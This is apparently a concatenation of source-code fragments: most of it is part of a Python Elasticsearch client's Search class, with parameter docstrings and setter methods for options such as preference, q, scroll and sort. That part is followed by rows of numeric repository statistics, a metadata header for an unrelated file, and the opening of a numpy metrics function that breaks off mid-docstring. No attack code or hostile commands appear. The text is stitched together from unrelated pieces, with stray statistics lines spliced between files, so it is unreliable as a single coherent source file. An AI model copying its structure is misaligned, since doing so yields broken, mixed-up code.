- ``_only_local`` Run the search only on shards on the local node.
- ``_local`` If possible, run the search on shards on the local
node. If not, select shards using the default method.
- ``_only_nodes:<node-id>,<node-id>`` Run the search on only the
specified nodes IDs. If suitable shards exist on more than one
selected nodes, use shards on those nodes using the default
method. If none of the specified nodes are available, select
shards from any available node using the default method.
- ``_prefer_nodes:<node-id>,<node-id>`` If possible, run the search
on the specified nodes IDs. If not, select shards using the
default method.
- ``_shards:<shard>,<shard>`` Run the search only on the specified
shards. This value can be combined with other preference values,
but this value must come first. For example:
``_shards:2,3|_local``
- ``<custom-string>`` Any string that does not start with _. If the
cluster state and selected shards do not change, searches using
the same ``<custom-string>`` value are routed to the same shards
in the same order.
:param q: ``Optional[str]``
Query in the Lucene query string syntax.
You can use the ``q`` parameter to run a query parameter search. Query
parameter searches do not support the full Elasticsearch `Query DSL
<https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl.html>`__
but are handy for testing.
.. IMPORTANT::
The ``q`` parameter overrides the query parameter in the request
body. If both parameters are specified, documents matching the query
request body parameter are not returned.
:param request_cache: ``Optional[bool]``
If ``true``, the caching of search results is enabled for requests where
``size`` is ``0``. See `Shard request cache settings
<https://www.elastic.co/guide/en/elasticsearch/reference/current/shard-request-cache.html>`__.
Defaults to index level settings.
:param rest_total_hits_as_int: ``bool``
Indicates whether ``hits.total`` should be rendered as an integer or an
object in the rest search response. Defaults to ``false``.
:param routing: ``Optional[str]``
Target the specified primary shard.
:param scroll: ``Optional[str]``
Period to retain the `search context
<https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#scroll-search-context>`__
for scrolling. Format is `Time units
<https://www.elastic.co/guide/en/elasticsearch/reference/current/common-options.html#time-units>`__.
See `Scroll search results
<https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#scroll-search-results>`__.
By default, this value cannot exceed ``1d`` (24 hours). You can change
this limit using the ``search.max_keep_alive`` cluster-level setting.
:param search_type: ``str``
How `distributed term frequencies
<https://en.wikipedia.org/wiki/Tf%E2%80%93idf>`__ are calculated for
`relevance scoring
<https://www.elastic.co/guide/en/elasticsearch/reference/current/query-filter-context.html#relevance-scores>`__.
Valid values:
- ``query_then_fetch`` (Default) Distributed term frequencies are
calculated locally for each shard running the search. We recommend
this option for faster searches with potentially less accurate
scoring.
- ``dfs_query_then_fetch`` Distributed term frequencies are
calculated globally, using information gathered from all shards
running the search. While this option increases the accuracy of
scoring, it adds a round-trip to each shard, which can result in
slower searches.
:param seq_no_primary_term: ``bool``
If ``true``, returns sequence number and primary term of the last
modification of each hit. See `Optimistic concurrency control
<https://www.elastic.co/guide/en/elasticsearch/reference/current/optimistic-concurrency-control.html>`__.
:param size: ``int``
Defines the number of hits to return. Defaults to ``10``.
By default, you cannot page through more than ``10,000`` hits using the
from and size parameters. To page through more hits, use the
`search_after
<https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#search-after>`__
parameter.
:param sort: ``Optional[Union[str, Sequence[Union[str, Mapping[str, str]]], Mapping[str, str]]]``
Change the order of the returned documents. See `sort search results
<https://www.elastic.co/guide/en/elasticsearch/reference/current/sort-search-results.html>`__.
The parameter can be:
- ``"field"`` or ``"-field"`` to sort a field ascending or
descending
- ``{"field": "asc"}`` or ``{"field": "desc"}`` to sort a field
ascending or descending
- a ``list`` of strings or objects as above to sort by a couple of
fields
- ``None`` to turn off sorting
:param stats: ``Optional[Sequence[str]]``
Stats groups to associate with the search. Each group maintains a
statistics aggregation for its associated searches. You can retrieve
these stats using the `indices stats API
<https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-stats.html>`__.
:param stored_fields: ``Optional[str]``
A comma-separated list of stored fields to return as part of a hit. If
no fields are specified, no stored fields are included in the response.
If this field is specified, the ``_source`` parameter defaults to
``false``. You can pass ``_source: true`` to return both source fields
and stored fields in the search response.
:param suggest_field: ``Optional[str]``
Specifies which field to use for suggestions.
:param suggest_text: ``Optional[str]``
The source text for which the suggestions should be returned.
:param terminate_after: ``int``
The maximum number of documents to collect for each shard, upon reaching
which the query execution will terminate early.
Defaults to ``0``, which does not terminate query execution early.
:param timeout: ``Optional[str]``
Specifies the period of time to wait for a response in `time units
<https://www.elastic.co/guide/en/elasticsearch/reference/current/common-options.html#time-units>`__.
If no response is received before the timeout expires, the request fails
and returns an error. Defaults to no timeout.
:param track_scores: ``bool``
If ``true``, calculate and return document scores, even if the scores
are not used for sorting. Defaults to ``false``.
:param track_total_hits: ``Union[int, bool]``
Number of hits matching the query to count accurately. Defaults to
``10000``.
If ``true``, the exact number of hits is returned at the cost of some
performance.
If ``false``, the response does not include the total number of hits
matching the query.
:param typed_keys: ``bool``
If ``true``, aggregation and suggester names are being prefixed by their
respective types in the response. Defaults to ``true``.
:param version: ``bool``
If ``true``, returns document version as part of a hit. Defaults to
``false``.
:returns: ``Search``
A new Search instance is created
"""
s = self._search.copy()
if source is not Unset:
s._parameters._params["_source"] = source
if source_excludes is not Unset:
s._parameters._params["_source_excludes"] = source_excludes
if source_includes is not Unset:
s._parameters._params["_source_includes"] = source_includes
if allow_no_indices is not Unset:
s._parameters._params["allow_no_indices"] = allow_no_indices
if allow_partial_search_results is not Unset:
s._parameters._params["allow_partial_search_results"] = allow_partial_search_results
if batched_reduce_size is not Unset:
s._parameters._params["batched_reduce_size"] = batched_reduce_size
if ccs_minimize_roundtrips is not Unset:
s._parameters._params["ccs_minimize_roundtrips"] = ccs_minimize_roundtrips
if docvalue_fields is not Unset:
s._parameters._params["docvalue_fields"] = docvalue_fields
if expand_wildcards is not Unset:
s._parameters._params["expand_wildcards"] = expand_wildcards
if explain is not Unset:
s._parameters._params["explain"] = explain
if fields is not Unset:
s._parameters._params["fields"] = fields
if from_ is not Unset:
s._parameters._params["from"] = from_
if ignore_throttled is not Unset:
s._parameters._params["ignore_throttled"] = ignore_throttled
if ignore_unavailable is not Unset:
s._parameters._params["ignore_unavailable"] = ignore_unavailable
if indices_boost is not Unset:
s._parameters._params["indices_boost"] = indices_boost
if max_concurrent_shard_requests is not Unset:
s._parameters._params["max_concurrent_shard_requests"] = max_concurrent_shard_requests
if min_score is not Unset:
s._parameters._params["min_score"] = min_score
if pre_filter_shard_size is not Unset:
s._parameters._params["pre_filter_shard_size"] = pre_filter_shard_size
if preference is not Unset:
s._parameters._params["preference"] = preference
if q is not Unset:
s._parameters._params["q"] = q
if request_cache is not Unset:
s._parameters._params["request_cache"] = request_cache
if rest_total_hits_as_int is not Unset:
s._parameters._params["rest_total_hits_as_int"] = rest_total_hits_as_int
if routing is not Unset:
s._parameters._params["routing"] = routing
if scroll is not Unset:
s._parameters._params["scroll"] = scroll
if search_type is not Unset:
s._parameters._params["search_type"] = search_type
if seq_no_primary_term is not Unset:
s._parameters._params["seq_no_primary_term"] = seq_no_primary_term
if size is not Unset:
s._parameters._params["size"] = size
if sort is not Unset:
s._parameters._params["sort"] = sort
if stats is not Unset:
s._parameters._params["stats"] = stats
if stored_fields is not Unset:
s._parameters._params["stored_fields"] = stored_fields
if suggest_field is not Unset:
s._parameters._params["suggest_field"] = suggest_field
if suggest_text is not Unset:
s._parameters._params["suggest_text"] = suggest_text
if terminate_after is not Unset:
s._parameters._params["terminate_after"] = terminate_after
if timeout is not Unset:
s._parameters._params["timeout"] = timeout
if track_scores is not Unset:
s._parameters._params["track_scores"] = track_scores
if track_total_hits is not Unset:
s._parameters._params["track_total_hits"] = track_total_hits
if typed_keys is not Unset:
s._parameters._params["typed_keys"] = typed_keys
if version is not Unset:
s._parameters._params["version"] = version
return s
def source(self, value: Union[bool, str, Sequence] = True) -> Search:
    """Set the ``_source`` search **body** parameter.

    Controls which `source fields
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
    appear in ``hits._source`` for matching documents. Accepts ``True``
    (return the entire source; the default), ``False`` (return no source),
    a wildcard (``*``) pattern or array of patterns selecting fields to
    return, or an object with ``includes``/``excludes`` wildcard pattern
    lists to pick a subset and optionally trim fields back out of it.

    :param value: source-field selector as described above.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("_source", value)
    return updated
def source_excludes(self, value: Optional[str] = None) -> Search:
    """Set the ``_source_excludes`` search **query** parameter.

    A comma-separated list of `source fields
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
    to drop from the response; also usable to trim fields out of the
    subset selected by ``_source_includes``. Ignored when ``_source``
    is ``false``.

    :param value: comma-separated field list, or ``None``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("_source_excludes", value)
    return updated
def source_includes(self, value: Optional[str] = None) -> Search:
    """Set the ``_source_includes`` search **query** parameter.

    A comma-separated list of `source fields
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
    to return; when given, only these fields are included (minus any
    removed again via ``_source_excludes``). Ignored when ``_source``
    is ``false``.

    :param value: comma-separated field list, or ``None``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("_source_includes", value)
    return updated
def allow_no_indices(self, value: bool = True) -> Search:
    """Set the ``allow_no_indices`` search **query** parameter.

    When ``False``, the request errors if any wildcard expression,
    `index alias
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-aliases.html>`__,
    or ``_all`` value resolves only to missing or closed indices — even
    if other targets of the request are open (e.g. ``foo*,bar*`` errors
    when something matches ``foo`` but nothing matches ``bar``).

    :param value: whether to tolerate expressions matching no indices.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("allow_no_indices", value)
    return updated
def allow_partial_search_results(self, value: bool = True) -> Search:
    """Set the ``allow_partial_search_results`` search **query** parameter.

    With ``True`` (the default) partial results are returned on request
    timeouts or `shard failures
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-replication.html#shard-failures>`__;
    with ``False`` such requests fail outright. The cluster-wide default
    can be changed via the ``search.default_allow_partial_results``
    setting.

    :param value: whether partial results are acceptable.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("allow_partial_search_results", value)
    return updated
def batched_reduce_size(self, value: int = 512) -> Search:
    """Set the ``batched_reduce_size`` search **query** parameter.

    How many shard results the coordinating node reduces at once — a
    protection mechanism bounding per-request memory overhead when the
    search may fan out to a large number of shards. Defaults to ``512``.

    :param value: batch size for the coordinating-node reduce phase.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("batched_reduce_size", value)
    return updated
def ccs_minimize_roundtrips(self, value: bool = True) -> Search:
    """Set the ``ccs_minimize_roundtrips`` search **query** parameter.

    When ``True`` (the default), network round-trips between the
    coordinating node and remote clusters are minimized during
    cross-cluster search (CCS) requests. See `How cross-cluster search
    handles network delays
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-cross-cluster-search.html#ccs-network-delays>`__.

    :param value: whether to minimize CCS round-trips.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("ccs_minimize_roundtrips", value)
    return updated
def docvalue_fields(
    self,
    value: Optional[Sequence[Union[str, Mapping[str, str]]]] = None,
) -> Search:
    """
    A search **body** parameter.
    :param value: ``Optional[Sequence[Union[str, Mapping[str, str]]]]``
        Array of wildcard (``*``) patterns. The request returns doc values for
        field names matching these patterns in the ``hits.fields`` property of
        the response.
        You can specify items in the array as a string or object. See `Doc value
        fields
        <https://www.elastic.co/guide/en/elasticsearch/reference/current/search-fields.html#docvalue-fields>`__.
        Properties of ``docvalue_fields`` objects:
        - ``field`` (Required, string) Wildcard pattern. The request returns
          doc values for field names matching this pattern.
        - ``format`` (Optional, string) Format in which the doc values are
          returned.
          For `date fields
          <https://www.elastic.co/guide/en/elasticsearch/reference/current/date.html>`__,
          you can specify a `date format
          <https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-date-format.html>`__.
          For `numeric fields
          <https://www.elastic.co/guide/en/elasticsearch/reference/current/number.html>`__,
          you can specify a `DecimalFormat pattern
          <https://docs.oracle.com/javase/8/docs/api/java/text/DecimalFormat.html>`__.
          For other field data types, this parameter is not supported.
    :returns: ``Search``
        A new Search instance is created
    """
    # Docstring fix only: the "date format" link previously used broken
    # Markdown-style syntax ("[date format](...html9.") inside reST docs;
    # it is now a proper reST hyperlink. Behavior is unchanged.
    return self._set_parameter("docvalue_fields", value)
def expand_wildcards(self, value: str = 'open') -> Search:
    """Set the ``expand_wildcards`` search **query** parameter.

    Controls which kinds of indices wildcard expressions may expand to;
    multiple comma-separated values are accepted (e.g. ``open,hidden``).
    Valid values: ``all`` (open and closed, including hidden), ``open``,
    ``closed``, ``hidden`` (must be combined with ``open``, ``closed``,
    or both), and ``none`` (wildcards rejected). Defaults to ``open``.

    :param value: wildcard-expansion mode(s).
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("expand_wildcards", value)
    return updated
def explain(self, value: bool = False) -> Search:
    """Set the ``explain`` search **body** parameter.

    When ``True``, each hit carries detailed information about how its
    score was computed. Defaults to ``False``.

    :param value: whether to include score explanations per hit.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("explain", value)
    return updated
def fields(
    self,
    value: Optional[Sequence[Union[str, Mapping[str, str]]]] = None,
) -> Search:
    """Set the ``fields`` search **body** parameter.

    An array of wildcard (``*``) patterns; field values matching them
    are returned in the ``hits.fields`` property of the response. Items
    may be plain strings or objects — see `Fields
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/search-fields.html#search-fields-param>`__.
    Object items support ``field`` (required wildcard pattern) and
    ``format`` (optional output format: the ``date``/``date_nanos``
    fields accept a date format; spatial fields accept ``geojson``
    (default) or ``wkt``; other field types do not support ``format``).

    :param value: field patterns (strings and/or objects), or ``None``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("fields", value)
    return updated
def from_(self, value: int = 0) -> Search:
    """Set the ``from`` search **body** parameter.

    Starting document offset (default ``0``). ``from`` + ``size`` paging
    is capped at ``10,000`` hits by default; beyond that, use the
    ``search_after`` parameter instead.

    :param value: zero-based offset of the first hit to return.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("from", value)
    return updated
def ignore_throttled(self, value: bool = True) -> Search:
    """Set the ``ignore_throttled`` search **query** parameter.

    When ``True`` (the default), concrete, expanded, or aliased indices
    are ignored if they are frozen.

    :param value: whether to skip frozen indices.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("ignore_throttled", value)
    return updated
def ignore_unavailable(self, value: bool = False) -> Search:
    """Set the ``ignore_unavailable`` search **query** parameter.

    When ``True``, missing or closed indices are silently excluded from
    the response instead of causing an error. Defaults to ``False``.

    :param value: whether to skip missing/closed indices.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("ignore_unavailable", value)
    return updated
def indices_boost(
    self,
    value: Optional[Sequence[Mapping[str, float]]] = None,
) -> Search:
    """Set the ``indices_boost`` search **body** parameter.

    Boosts the ``_score`` of documents coming from specific indices.
    Each entry maps ``<index>`` (an index name or alias; wildcard ``*``
    expressions supported) to a ``float`` ``<boost-value>`` the scores
    are multiplied by — values above ``1.0`` raise the score, values
    between ``0`` and ``1.0`` lower it.

    :param value: sequence of ``{index: boost}`` mappings, or ``None``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("indices_boost", value)
    return updated
def max_concurrent_shard_requests(self, value: int = 5) -> Search:
    """Set the ``max_concurrent_shard_requests`` search **query** parameter.

    The number of concurrent per-node shard requests this search runs;
    use it to bound the number of concurrent shard requests and thereby
    limit the search's impact on the cluster. Defaults to ``5``.

    :param value: per-node concurrent shard-request cap.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("max_concurrent_shard_requests", value)
    return updated
def min_score(self, value: Optional[float] = None) -> Search:
    """Set the ``min_score`` search **body** parameter.

    Minimum ``_score`` a document must reach to be included; documents
    scoring lower are left out of the search results.

    :param value: minimum score threshold, or ``None`` for no threshold.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("min_score", value)
    return updated
def pre_filter_shard_size(self, value: Optional[int] = None) -> Search:
    """Set the ``pre_filter_shard_size`` search **query** parameter.

    Threshold that forces a pre-filter round-trip which prefilters
    search shards via query rewriting when the request expands to more
    shards than the threshold. The round-trip can sharply cut the shard
    count when, e.g., a shard's rewrite method shows it cannot match any
    documents (mandatory date filters disjoint from the shard bounds).
    If unspecified, the pre-filter phase runs when any of the following
    holds: the request targets more than 128 shards; it targets one or
    more read-only index; the query's primary sort targets an indexed
    field.

    :param value: shard-count threshold, or ``None`` for the default rules.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("pre_filter_shard_size", value)
    return updated
def preference(self, value: Optional[str] = None) -> Search:
    """Set the ``preference`` search **query** parameter.

    Chooses the nodes and shards the search runs on. By default
    Elasticsearch picks among eligible nodes and shards via `adaptive
    replica selection
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/search-shard-routing.html#search-adaptive-replica>`__,
    honoring `allocation awareness
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-cluster.html#shard-allocation-awareness>`__.
    Valid values:

    - ``_only_local`` — only shards on the local node.
    - ``_local`` — prefer local-node shards, else fall back to the
      default method.
    - ``_only_nodes:<node-id>,<node-id>`` — only the listed nodes; if
      suitable shards exist on several of them, pick shards there via
      the default method; if none are available, fall back to any node.
    - ``_prefer_nodes:<node-id>,<node-id>`` — prefer the listed nodes,
      else fall back to the default method.
    - ``_shards:<shard>,<shard>`` — only the listed shards; may be
      combined with other preference values but must come first, e.g.
      ``_shards:2,3|_local``.
    - ``<custom-string>`` — any string not starting with ``_``; while
      the cluster state and selected shards stay unchanged, searches
      with the same string are routed to the same shards in the same
      order.

    :param value: preference expression, or ``None`` for the default.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("preference", value)
    return updated
def q(self, value: Optional[str] = None) -> Search:
    """Set the ``q`` search **query** parameter.

    A query in the Lucene query string syntax, enabling a query
    parameter search. Such searches do not support the full
    Elasticsearch `Query DSL
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl.html>`__
    but are handy for testing.

    .. IMPORTANT::
        ``q`` overrides the query in the request body: when both are
        given, documents matching only the body query are not returned.

    :param value: Lucene query string, or ``None``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("q", value)
    return updated
def request_cache(self, value: Optional[bool] = None) -> Search:
    """Set the ``request_cache`` search **query** parameter.

    When ``True``, search-result caching is enabled for requests whose
    ``size`` is ``0``; see `Shard request cache settings
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/shard-request-cache.html>`__.
    Defaults to the index-level settings.

    :param value: cache toggle, or ``None`` to use index settings.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("request_cache", value)
    return updated
def rest_total_hits_as_int(self, value: bool = False) -> Search:
    """Set the ``rest_total_hits_as_int`` search **query** parameter.

    Whether ``hits.total`` is rendered as a plain integer rather than an
    object in the REST search response. Defaults to ``False``.

    :param value: render ``hits.total`` as an integer when ``True``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("rest_total_hits_as_int", value)
    return updated
def routing(self, value: Optional[str] = None) -> Search:
    """Set the ``routing`` search **query** parameter.

    Targets the specified primary shard.

    :param value: routing value, or ``None``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("routing", value)
    return updated
def scroll(self, value: Optional[str] = None) -> Search:
    """Set the ``scroll`` search **query** parameter.

    How long to retain the `search context
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#scroll-search-context>`__
    for scrolling, expressed in `Time units
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/common-options.html#time-units>`__;
    see `Scroll search results
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#scroll-search-results>`__.
    By default the value cannot exceed ``1d`` (24 hours); that limit is
    adjustable via the ``search.max_keep_alive`` cluster-level setting.

    :param value: scroll keep-alive period, or ``None``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("scroll", value)
    return updated
def search_type(self, value: str = 'query_then_fetch') -> Search:
    """Set the ``search_type`` search **query** parameter.

    How `distributed term frequencies
    <https://en.wikipedia.org/wiki/Tf%E2%80%93idf>`__ are computed for
    `relevance scoring
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/query-filter-context.html#relevance-scores>`__.
    Valid values:

    - ``query_then_fetch`` (default) — term frequencies are computed
      locally per shard; recommended for faster searches at the cost of
      potentially less accurate scoring.
    - ``dfs_query_then_fetch`` — term frequencies are computed globally
      from all shards running the search; more accurate scoring, but an
      extra round-trip per shard can slow the search down.

    :param value: ``query_then_fetch`` or ``dfs_query_then_fetch``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("search_type", value)
    return updated
def seq_no_primary_term(self, value: bool = False) -> Search:
    """Set the ``seq_no_primary_term`` search **body** parameter.

    When ``True``, each hit includes the sequence number and primary
    term of its last modification; see `Optimistic concurrency control
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/optimistic-concurrency-control.html>`__.

    :param value: whether to return seq_no and primary_term per hit.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("seq_no_primary_term", value)
    return updated
def size(self, value: int = 10) -> Search:
    """Set the ``size`` search **body** parameter.

    Number of hits to return (default ``10``). ``from`` + ``size``
    paging is capped at ``10,000`` hits by default; page deeper with the
    `search_after
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/paginate-search-results.html#search-after>`__
    parameter.

    :param value: maximum number of hits to return.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("size", value)
    return updated
def sort(
    self,
    value: Optional[Union[str, Sequence[Union[str, Mapping[str, str]]], Mapping[str, str]]] = None,
) -> Search:
    """Set the ``sort`` search **body** parameter.

    Changes the order of the returned documents; see `sort search
    results
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/sort-search-results.html>`__.
    Accepted forms: ``"field"``/``"-field"`` for ascending/descending;
    ``{"field": "asc"}`` or ``{"field": "desc"}``; a ``list`` of such
    strings/objects to sort by several fields; or ``None`` to turn
    sorting off.

    :param value: sort specification as described above.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("sort", value)
    return updated
def stats(self, value: Optional[Sequence[str]] = None) -> Search:
    """Set the ``stats`` search **body** parameter.

    Stats groups to associate with the search; each group keeps a
    statistics aggregation over its searches, retrievable through the
    `indices stats API
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-stats.html>`__.

    :param value: sequence of stats group names, or ``None``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("stats", value)
    return updated
def stored_fields(self, value: Optional[str] = None) -> Search:
    """Set the ``stored_fields`` search **query** parameter.

    Comma-separated list of stored fields to return with each hit;
    when no fields are specified, no stored fields appear in the
    response. Specifying this field flips the ``_source`` parameter's
    default to ``false`` — pass ``_source: true`` to get both source
    and stored fields back.

    :param value: comma-separated stored-field list, or ``None``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("stored_fields", value)
    return updated
def suggest_field(self, value: Optional[str] = None) -> Search:
    """Set the ``suggest_field`` search **query** parameter.

    Which field to use for suggestions.

    :param value: field name for suggestions, or ``None``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("suggest_field", value)
    return updated
def suggest_text(self, value: Optional[str] = None) -> Search:
    """Set the ``suggest_text`` search **query** parameter.

    The source text for which suggestions should be returned.

    :param value: suggestion source text, or ``None``.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("suggest_text", value)
    return updated
def terminate_after(self, value: int = 0) -> Search:
    """Set the ``terminate_after`` search **body** parameter.

    Per-shard cap on collected documents; once a shard reaches it, its
    query execution terminates early. The default ``0`` disables early
    termination.

    :param value: per-shard document-collection cap (``0`` = off).
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("terminate_after", value)
    return updated
def timeout(self, value: Optional[str] = None) -> Search:
    """Set the ``timeout`` search **query** parameter.

    How long to wait for a response, in `time units
    <https://www.elastic.co/guide/en/elasticsearch/reference/current/common-options.html#time-units>`__;
    if no response arrives before the timeout expires, the request fails
    with an error. Defaults to no timeout.

    :param value: timeout period, or ``None`` for no timeout.
    :returns: a new ``Search`` instance with the parameter applied.
    """
    updated = self._set_parameter("timeout", value)
    return updated
def track_scores(self, value: bool = False) -> Search:
    """Set the ``track_scores`` search **query** parameter.

    :param value: ``bool``
        When ``true``, document scores are computed and returned even if
        they play no role in sorting. Defaults to ``false``.
    :returns: ``Search``
        A fresh Search instance carrying the updated parameter.
    """
    return self._set_parameter("track_scores", value)
def track_total_hits(self, value: Union[int, bool] = 10000) -> Search:
    """Set the ``track_total_hits`` search **query** parameter.

    :param value: ``Union[int, bool]``
        How many matching hits to count accurately; defaults to ``10000``.
        Passing ``true`` returns the exact hit count at some performance
        cost, while ``false`` omits the total hit count from the response
        entirely.
    :returns: ``Search``
        A fresh Search instance carrying the updated parameter.
    """
    return self._set_parameter("track_total_hits", value)
def typed_keys(self, value: bool = True) -> Search:
    """Set the ``typed_keys`` search **query** parameter.

    :param value: ``bool``
        When ``true``, aggregation and suggester names in the response are
        prefixed with their respective types. Defaults to ``true``.
    :returns: ``Search``
        A fresh Search instance carrying the updated parameter.
    """
    return self._set_parameter("typed_keys", value)
def version(self, value: bool = False) -> Search:
    """Set the ``version`` search **query** parameter.

    :param value: ``bool``
        When ``true``, each hit includes the document version. Defaults
        to ``false``.
    :returns: ``Search``
        A fresh Search instance carrying the updated parameter.
    """
    return self._set_parameter("version", value)
| 43.767113
| 2,081
| 0.597113
| 6,800
| 58,823
| 5.064706
| 0.073676
| 0.01565
| 0.021341
| 0.024187
| 0.849071
| 0.839634
| 0.818583
| 0.796748
| 0.790157
| 0.782259
| 0
| 0.002797
| 0.307125
| 58,823
| 1,343
| 2,082
| 43.799702
| 0.842211
| 0.643422
| 0
| 0.323899
| 1
| 0.003145
| 0.156106
| 0.024926
| 0
| 0
| 0
| 0
| 0
| 1
| 0.122642
| false
| 0.003145
| 0.012579
| 0
| 0.27044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
083c83d6a84931ff49682aca918677d46af3595d
| 158
|
py
|
Python
|
src/podspy/log/__init__.py
|
jwllee/podspy
|
a3ab176a83004069a27405acfc42838c135c555d
|
[
"MIT"
] | 1
|
2019-02-06T09:26:17.000Z
|
2019-02-06T09:26:17.000Z
|
src/podspy/log/__init__.py
|
wailamjonathanlee/podspy
|
a3ab176a83004069a27405acfc42838c135c555d
|
[
"MIT"
] | 12
|
2019-01-02T14:31:17.000Z
|
2019-01-22T18:24:03.000Z
|
src/podspy/log/__init__.py
|
wailamjonathanlee/podspy
|
a3ab176a83004069a27405acfc42838c135c555d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# loading modules into subpackage namespace
from podspy.log import data_io
from podspy.log import table
from podspy.log import factory
| 22.571429
| 43
| 0.810127
| 25
| 158
| 5.08
| 0.68
| 0.23622
| 0.307087
| 0.448819
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132911
| 158
| 6
| 44
| 26.333333
| 0.927007
| 0.392405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f2a59aae4451e93fd7addbfd62fb6d284caf688f
| 2,692
|
py
|
Python
|
evaluation/metrics.py
|
umautobots/osp
|
d055f1c846f907445186b9dea7da2d4dca4790a6
|
[
"MIT"
] | 1
|
2021-11-08T07:27:39.000Z
|
2021-11-08T07:27:39.000Z
|
evaluation/metrics.py
|
swb19/osp
|
d055f1c846f907445186b9dea7da2d4dca4790a6
|
[
"MIT"
] | null | null | null |
evaluation/metrics.py
|
swb19/osp
|
d055f1c846f907445186b9dea7da2d4dca4790a6
|
[
"MIT"
] | 2
|
2021-07-24T21:27:56.000Z
|
2021-10-31T14:13:20.000Z
|
import numpy as np
def get_expected_dist_by_time_fcns(select_inds=None):
    """Build (init, accumulate, reduce) callbacks for the mean expected
    displacement error at selected prediction timesteps.

    Fix: the default ``select_inds`` was a mutable ``np.ndarray`` evaluated
    once at import time (mutable-default pitfall); it is now a ``None``
    sentinel resolved per call, with identical default behavior.

    :param select_inds: integer indices of timesteps to evaluate;
        defaults to ``np.arange(9, 60, 10)``.
    :return: tuple ``(init_fcn, accumulate_fcn, reduce_fcn)``
    """
    if select_inds is None:
        select_inds = np.arange(9, 60, 10)
    init_fcn = lambda: []

    def accumulate_fcn(accumulator, y_hats, p, y_true, **kwargs):
        """Append this example's per-timestep expected distances.

        :param accumulator: list of average distances from previous examples;
            list[i] = (si, n_agents) array
        :param y_hats: n_steps, n_agents, 2, n_samples
        :param p: n_agents, n_samples | probabilities summing to 1
